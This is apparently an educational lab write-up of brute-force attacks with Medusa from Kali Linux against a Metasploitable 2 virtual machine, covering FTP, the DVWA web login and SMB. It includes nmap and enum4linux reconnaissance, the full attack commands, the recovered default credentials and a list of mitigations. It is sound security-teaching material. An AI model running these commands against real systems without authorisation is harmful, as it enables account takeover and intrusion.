This project presents a practical cybersecurity analysis focused on brute force attacks, developed in a controlled environment exclusively for educational purposes. Using the Medusa tool in conjunction with Kali Linux, real attack scenarios were simulated against the Metasploitable 2 system, covering three distinct attack vectors: FTP service (File Transfer Protocol), web form through DVWA (Damn Vulnerable Web Application), and SMB protocol (Server Message Block).
The environment was structured using isolated virtual machines in VirtualBox, configured in a host-only network to ensure total security during testing. Simplified and customized wordlists were developed specifically for educational purposes, allowing for clear demonstration of how authentication vulnerabilities can be exploited through automated attacks.
Beyond the practical execution of attacks, the project documents in detail the entire technical process, from initial environment setup to analysis of obtained results, including proposals for mitigation measures and security best practices. The main objective is to provide a deep understanding of authentication vulnerabilities, offensive security audit techniques, and most importantly, how to protect systems against these threats in the real world.
Warning: All activities were performed in an isolated and controlled environment, respecting ethical principles of responsible hacking.
- Understand the technical functioning of brute force attacks on different protocols
- Master the use of Kali Linux and the Medusa tool in practical scenarios
- Develop technical documentation skills in information security
- Identify common configuration and authentication failures in systems
- Learn to propose effective countermeasures to protect corporate environments
- Apply ethical hacking principles in a controlled environment
- Operating System: Kali Linux
- Main Tool: Medusa
- Testing Environment: Metasploitable 2 / DVWA
- Virtualization: VirtualBox
Before initiating any penetration testing, it is fundamental to establish communication between machines and identify the target. For this, the first step was to initialize the Metasploitable 2 virtual machine and obtain its IP address on the internal network.
With the Metasploitable VM running, the following command was used in the target machine's terminal to identify its IP address:
ip aIdentified IP address: 192.168.56.101
This IP will be used as the target in all subsequent attack scenarios.
After identifying the target's IP, a complete scan was performed to identify open ports and active services on the system. This step is fundamental to map the available attack surface.
Command executed:
nmap -sV -p 21,80,139,445 192.168.56.101Parameter explanation:
-sV: Detects versions of running services-p 21,80,139,445: Specifies the ports to be scanned:- 21: FTP (File Transfer Protocol)
- 80: HTTP (Web)
- 139: NetBIOS/SMB
- 445: SMB (Server Message Block)
192.168.56.101: Target IP address
Scan result:
✅ Identified services:
- Port 21: vsftpd 2.3.4 (FTP)
- Port 80: Apache httpd 2.2.8 (HTTP)
- Port 139: Samba smbd 3.X (NetBIOS)
- Port 445: Samba smbd 3.X (SMB)
All identified services are active and accessible, confirming the attack vectors that will be exploited in subsequent scenarios.
Demonstrate how an attacker can compromise the FTP service through automated authentication attempts, exploiting weak passwords or unsafe patterns.
To perform the brute force attack, two customized wordlists were created containing common usernames and passwords. Since this is an educational environment, the lists were intentionally kept small to speed up the process and facilitate understanding.
Creating the user list:
echo -e 'user\nmsfadmin\nadmin\nroot' > users.txtContent of users.txt file:
user
msfadmin
admin
root
Creating the password list:
echo -e '123456\npassword\nqwerty\nmsfadmin' > passwords.txtContent of passwords.txt file:
123456
password
qwerty
msfadmin
Note: In real scenarios, attackers use much more extensive wordlists containing thousands or millions of possible combinations, including variations, dictionaries, and passwords leaked in data breaches.
With wordlists prepared and the FTP service confirmed, the attack was executed using the Medusa tool, which systematically tests all username and password combinations.
Command executed:
medusa -h 192.168.56.101 -U users.txt -P passwords.txt -M ftp -t 6Parameter explanation:
-h 192.168.56.101: Defines the target host (IP) of the attack-U users.txt: Specifies the file containing the user list-P passwords.txt: Specifies the file containing the password list-M ftp: Defines the attack module (FTP protocol)-t 6: Establishes 6 parallel threads to speed up the process
How it works:
Medusa performs login attempts by combining each user from the list with each password from the list, in an automated and parallel manner. The process continues until all combinations are tested or valid credentials are found.
Attack result:
✅ Compromised credentials:
- Username:
msfadmin - Password:
msfadmin
To confirm the success of the attack, a legitimate connection to the FTP server was made using the obtained credentials.
Command executed:
ftp 192.168.56.101When executing the command, the system prompted for authentication credentials:
Name: msfadmin
Password: msfadmin
✅ Access confirmed: Successful login to FTP server, demonstrating that the brute force attack was effective.
Demonstrate how attackers can compromise web applications through automated brute force attacks on authentication forms, exploiting weak passwords and the absence of protections against repeated login attempts.
With the Metasploitable server active, the presence of DVWA (Damn Vulnerable Web Application) was identified - an intentionally vulnerable web application designed for security training.
Identified application URL:
http://192.168.56.101/dvwa/login.php
To understand how the login form works and prepare the attack, technical analysis of the page was necessary using the browser's developer tools.
Using the "Inspect Element" function of the browser (F12), it was possible to identify crucial information about the form:
Information collected:
-
HTTP Method: POST
-
Target URL:
/dvwa/login.php -
Form fields:
username: Username fieldpassword: Password fieldLogin: Submit button
-
Error message: When attempting an invalid login, the application returns the message:
Login failed
Importance: The "Login failed" message will be used as a failure indicator for Medusa, allowing the tool to identify when an authentication attempt was unsuccessful and continue testing other combinations.
Identified form structure:
Following the same methodology as the FTP attack, customized wordlists were created for the web form attack.
Creating the user list:
echo -e "user\nmsfadmin\nadmin\nroot" > usersDVWA.txtContent of usersDVWA.txt file:
user
msfadmin
admin
root
Creating the password list:
echo -e "123456\npassword\nqwerty\nmsfadmin" > passwordsDVWA.txtContent of passwordsDVWA.txt file:
123456
password
qwerty
msfadmin
With all necessary information collected, the attack was executed using Medusa's HTTP module, specifically designed for web form attacks.
Command executed:
medusa -h 192.168.56.101 -U usersDVWA.txt -P passwordsDVWA.txt -M http -m DIR:/dvwa/login.php -m FORM:"username=USER&password=PASS&Login=Login" -m FAIL-LOGIN:"Login failed" -t 6Detailed parameter explanation:
-h 192.168.56.101: Defines the IP address of the target host (server)-U usersDVWA.txt: Specifies the file containing the list of usernames to be tested-P passwordsDVWA.txt: Specifies the file containing the list of passwords to be tested-M http: Defines the attack module for HTTP protocol (web forms)-m DIR:/dvwa/login.php: Specifies the directory/path of the login page in the web application-m FORM:"username=USER&password=PASS&Login=Login": Defines the POST form structure, where:username=USER: Username field (USER will be replaced by each wordlist entry)password=PASS: Password field (PASS will be replaced by each wordlist entry)Login=Login: Submit button parameter
-m FAIL-LOGIN:"Login failed": Defines the string indicating authentication failure (used to identify unsuccessful attempts)-t 6: Establishes 6 parallel threads to optimize attack speed
How it works:
Medusa performs HTTP POST requests to the login page, sending combinations of username and password. For each response received, the tool checks if it contains the string "Login failed":
- If contains: The attempt failed and Medusa continues testing
- If not contains: The credentials are valid and the attack was successful
Attack result:
✅ Tested credentials:
- Username:
admin - Password:
password
To confirm the success of the attack, a manual login to the DVWA application was performed using the discovered credentials.
Validation steps:
- Access:
http://192.168.56.101/dvwa/login.php - Enter credentials:
- Username:
admin - Password:
password
- Username:
- Click "Login"
Result:
✅ Access confirmed: Successful login, redirected to DVWA administrative panel.
Demonstrate how attackers can compromise SMB (Server Message Block) file sharing services through user enumeration and automated brute force attacks, exploiting insecure configurations and weak credentials in corporate environments.
Unlike previous scenarios, attacking the SMB protocol requires an additional enumeration phase. This process allows identifying valid users, available shares, password policies, and other valuable information about the target system before starting the actual attack.
To perform this enumeration, the enum4linux tool was used, specialized in extracting information from Windows and Samba systems through the SMB protocol.
Command executed:
enum4linux -a 192.168.56.101 | tee enum4_output.txtDetailed parameter explanation:
enum4linux: Enumeration tool for SMB/CIFS systems-a: Executes all available enumeration options, including:- System user enumeration
- Groups and members enumeration
- Network shares listing
- Password policy information
- Operating system information
- Domain/workgroup details
192.168.56.101: Target address| tee enum4_output.txt: Pipe operator that:- Displays output on terminal in real-time
- Simultaneously saves all output to
enum4_output.txtfile for later analysis
Relevant information obtained:
After executing the command, the following were identified:
✅ Enumerated users:
usermsfadminserviceroot- Other system users
✅ Available shares:
tmp- Temporary directoryIPC$- Inter-process communication- Other shares
✅ Security policies:
- No account lockout configured
- No password complexity required
- No password expiration
Enumeration importance: This phase is crucial as it provides a list of valid users, significantly reducing the number of attempts needed and increasing attack success rate. Instead of testing random users, the attacker focuses only on accounts that actually exist on the system.
Based on information collected during enumeration, more specific wordlists were created, prioritizing identified users.
Creating the user list:
echo -e 'user\nmsfadmin\nservice' > usersSMB.txtContent of usersSMB.txt file:
user
msfadmin
service
Note: Different from previous scenarios, this wordlist was built based on real enumeration, containing only confirmed users on the target system.
Creating the password list:
echo -e 'password\n123456\nwelcome123\nmsfadmin' > passwordsSMB.txtContent of passwordsSMB.txt file:
password
123456
welcome123
msfadmin
With wordlists prepared and users enumerated, the attack was executed using Medusa's smbnt module, specifically designed for SMB/CIFS protocol.
Command executed:
medusa -h 192.168.56.101 -U usersSMB.txt -P passwordsSMB.txt -M smbnt -t 2 -T 50Detailed parameter explanation:
-h 192.168.56.101: Defines the IP address of the target host (server)-U usersSMB.txt: Specifies the file containing the list of enumerated users-P passwordsSMB.txt: Specifies the file containing the list of passwords to be tested-M smbnt: Defines the attack module for SMB/CIFS protocol (Server Message Block)-t 2: Establishes 2 parallel threads (simultaneous connections)- Reduced value to avoid overloading the target server
- Reduces chances of detection by monitoring systems
- Recommended for SMB services that may be sensitive to multiple connections
-T 50: Defines the timeout of 50 seconds for each connection attempt- Maximum wait time for each attempt before considering failure
- Important for SMB services that may have higher latency
How it works:
Medusa performs authentication attempts on the SMB service by combining each user with each password. The SMB protocol uses NTLM authentication, and Medusa's smbnt module simulates this process to test credentials.
Strategic difference:
- Reduced threads (-t 2): Unlike FTP which used 6 threads, SMB is more sensitive and may block excessive connections
- Larger timeout (-T 50): SMB may be slower in responding to authentication compared to other protocols
Attack result:
✅ Compromised credentials:
- Username:
msfadmin - Password:
msfadmin
To confirm the success of the attack and verify accessible resources, the smbclient tool was used to establish a legitimate connection to the server.
Command executed:
smbclient -L //192.168.56.101 -U msfadminParameter explanation:
smbclient: Command-line client for accessing SMB/CIFS resources-L: Lists all available shares on the server (List shares)//192.168.56.101: Server address in UNC format (Universal Naming Convention)-U msfadmin: Specifies the username for authentication
After executing the command, the password was requested:
Enter msfadmin's password: msfadmin
Result:
✅ Access confirmed: Connection successfully established, listing the following shares:
- Description: Establish minimum requirements for strong passwords across all systems.
- Implementation: Minimum 12 characters, combination of uppercase, lowercase, numbers, and symbols.
- Description: Limit authentication attempts within a determined period.
- Implementation: Temporary lockout after 3-5 failed attempts with increasing time. Use Fail2Ban for automation.
- Description: Add a second authentication layer beyond the password.
- Implementation: TOTP via apps (Google Authenticator), hardware tokens (YubiKey), mandatory for administrative accounts.
- Description: Record and analyze authentication attempts.
- Implementation: Logs of all attempts, alerts for multiple failures, minimum 90-day retention.
- Description: Prevent identification of valid users.
- Implementation: Generic error messages, disable user listing, block enumeration tools.
- Description: Limit access to critical services.
- Implementation: Firewall with IP whitelisting, VPN for remote access, VLANs for segregation.
Main vulnerabilities: Weak credentials, plaintext transmission, no attempt limitation.
Recommendations:
- Migrate to SFTP/FTPS - Encrypt all transfers
- Configure Fail2Ban - Block after 3 failed attempts
- Restrict by IP - Whitelist authorized IPs
- Disable root/admin - Create specific FTP users
- Implement chroot - Isolate users in directories
Main vulnerabilities: Weak credentials, lack of CAPTCHA, revealing error messages.
Recommendations:
- Implement CAPTCHA - reCAPTCHA after 2-3 attempts
- Rate Limiting - Limit 5 attempts per 15 minutes
- WAF - ModSecurity, CloudFlare, or AWS WAF
- Generic messages - "Invalid credentials" only
- Account lockout - After 5 attempts with email recovery
- Security headers - HSTS, X-Frame-Options, force HTTPS
- Kali Linux – Official Site
- DVWA – Damn Vulnerable Web Application
- Medusa – Documentation
- Nmap – Official Manual
This project was developed exclusively for educational purposes in a controlled environment.
IMPORTANT:
- All tests were performed on isolated virtual machines
- Never use these techniques on systems without explicit authorization
- Misuse of these techniques is illegal and may result in criminal consequences
- This material should not be used for malicious activities
Phablo Loureiro Alves





